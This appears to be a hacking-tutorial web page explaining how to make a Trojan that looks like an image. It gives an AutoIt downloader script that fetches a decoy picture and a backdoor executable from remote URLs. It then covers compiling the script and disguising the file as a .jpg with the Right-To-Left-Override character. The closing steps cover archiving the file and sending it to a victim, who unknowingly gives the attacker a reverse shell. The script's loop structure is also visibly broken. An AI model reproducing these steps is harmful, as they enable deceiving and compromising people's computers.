White Hat Institute

Embedding malicious payloads into any file types (method-1)

In this instructional tutorial, we want to show you how to embed malicious payloads into an image file and create a Trojan out of it. This method can be implied to any file type; pdf, txt, doc, excel, exe, and so on. Without further ado, let’s get started.

Open up any file editor and copy/paste the simple code written below.

#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = “url1,url2”
Local $urlsArray = StringSplit($urls, “,”, 2 )
For $url In $urlsArray
$sFile = _DownloadFile($url)
Func _DownloadFile($sURL)
Local $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, “^.*/”, ““)
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17, 1)
Return $sDirectory
EndFunc ;==>_GetURLImage

As it shows in the screenshot, for “url1,” add a direct link to a file that you want to display on pc, and for “url2,” add a direct link to an executable backdoor.

malicious payloads 1

Then save and rename the file adding the .au3 extension at the end.

Embedding malicious payloads 2

Now we need to compile it in AutoIt compiler “Aut2Exe” to make the file executable.

1. Open the Kali menu and search for the “AutoIt v3.”

2. Click “Compile Script to .exe”

3. The main “Aut2Exe” interface should appear.

Embedding malicious payloads 3

4. Use the “Browse” buttons to select your source “.au3” and output “.exe” files.

5. If you want, you can change the icon of the resulting “.exe” file. (We highly recommend you to visit some online pages that make icons. This process is relatively simple and will not be explained here).

6. The other option you might wish to change is the compression level. Use the “Compression” menu to set this. As with all compression routines, the better the compression you select, the slower it will be. However, no matter what compression level you choose, the decompression speed is the same.

7. Click on “Convert” to compile the script.

Embedding malicious payloads 4

Our Executable code is ready and saved in Desktop as “nissan-gtr.Exe.” To make this file more convincing, we need to change the extension “.exe” to “.jpg.” To do so, we will use a prebuild tool in Kali Linux called “character.” Search for an app and run. Then in the app, search for “Right-To-Left-Override.” Click on it and copy the character.

“Right-To-Left-Override” is a Unicode mainly used for writing and reading Arabic or Hebrew text. Unicode has a particular character, “U+202e”, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to mask the names of files and can be attached to the carrier like email. For example, the file name with “nissan-gtrgpj.exe” is actually “nissan-gtrexe.jpg,” which is an executable file with a “U+202e” character placed just before “gpj.”

Embedding malicious payloads 5

As it is shown in the image above, in the file editor, we wrote a file name as “nissan-gtrgpj.exe” and pasted the copied “U+202e” character in between the letters “gtr” and “gpj.”

Embedding malicious payloads 6

It will switch the “.exe” extension with the letters “gpj” but written from right to left. So our file name will appear as “nissan-gtrexe.jpg.”

Embedding malicious payloads 7

Next, copy a new name and rename your executable. Now it is ready to be sent to the victim. As you can see in the screenshot, our Trojan file looks very convincing. Once it is opened in the target computer, our victim will see only the image of a car and will not be aware of the malicious payload running in the background sending the attacker a reverse shell.

Embedding malicious payloads 8


It is a good practice to archive the executables before sending them, because some of the browsers may revert the spoofed extensions to the original ones.